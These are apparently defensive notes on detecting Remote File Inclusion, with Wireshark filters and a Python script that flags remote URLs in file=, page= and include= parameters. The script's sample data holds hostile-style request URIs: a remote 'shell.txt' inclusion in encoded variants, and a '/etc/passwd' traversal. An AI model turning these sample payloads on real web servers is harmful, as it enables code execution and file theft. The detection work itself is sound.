Remote File Inclusion (RFI): the attacker forces the application to include and execute a remote file by supplying a URL in parameters such as file=, page= or include=.
Hunting
Statistics → Conversations → IPv4
Statistics → Endpoints → IPv4
Statistics → Protocol Hierarchy
Statistics → IO Graph
Red Flags
- Full URLs (http://, https://) inside parameters such as file=, page=, include= pointing to external domains
- URL-encoded remote references (http%3A%2F%2F)
- Immediate outbound traffic from the web server after the request
- 200 response followed by suspicious server behavior
Filters
# Generic external URL in parameters
http.request.uri contains "http://" or http.request.uri contains "https://"
# Direct remote URL inclusion attempt
http.request.uri matches "(?i)(file=|page=|include=).*https?://"
# URL-encoded remote inclusion
http.request.uri matches "(?i)(file=|page=|include=).*http%3A%2F%2F"
# Correlate suspicious source (192.168.10.5 is a placeholder; substitute the client under investigation)
http.request.uri matches "(?i)(file=|page=|include=)" and ip.src == 192.168.10.5
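The same checks as an offline triage script, added here as an example that is not part of the original notes: it applies the page's file=/page=/include= patterns to constructed sample request URIs after repeated URL-decoding, so plain, encoded and double-encoded remote references are all caught by one rule. Parameter names, sample URIs and the 203.0.113.10 host are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters the notes call out as common RFI sinks (assumed list)
SUSPECT_PARAMS = ("file", "page", "include")
# Same intent as the Wireshark filter: a remote scheme anywhere in the value
REMOTE_SCHEME = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample request URIs (not captured traffic)
SAMPLE_URIS = [
    "/index.php?page=home",
    "/index.php?page=http://203.0.113.10/shell.txt",
    "/view.php?file=http%3A%2F%2F203.0.113.10%2Fx.txt",
    "/view.php?file=%2568ttp%253A%252F%252F203.0.113.10%2Fx.txt",  # double-encoded
    "/img.php?include=../../etc/passwd",   # LFI-style, no remote scheme
    "/search?q=https://example.com",        # URL in a non-sink parameter
]


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly until stable, so double encoding does not hide the scheme."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def rfi_findings(uri: str) -> list:
    """Return (param, decoded_value) pairs where a sink parameter carries a remote URL."""
    findings = []
    query = urlsplit(uri).query
    # parse_qsl already decodes one layer; decode_fully handles the rest
    for name, raw in parse_qsl(query, keep_blank_values=True):
        if name.lower() not in SUSPECT_PARAMS:
            continue
        value = decode_fully(raw)
        if REMOTE_SCHEME.search(value):
            findings.append((name, value))
    return findings


def flag_uris(uris) -> list:
    """Return [(uri, findings)] for every URI with at least one RFI indicator."""
    return [(u, rfi_findings(u)) for u in uris if rfi_findings(u)]


if __name__ == "__main__":
    for uri, hits in flag_uris(SAMPLE_URIS):
        print(uri, "->", hits)
```

Both the Wireshark filters and this script only see cleartext HTTP; for TLS traffic the same logic has to run on decrypted captures or on web server / proxy access logs.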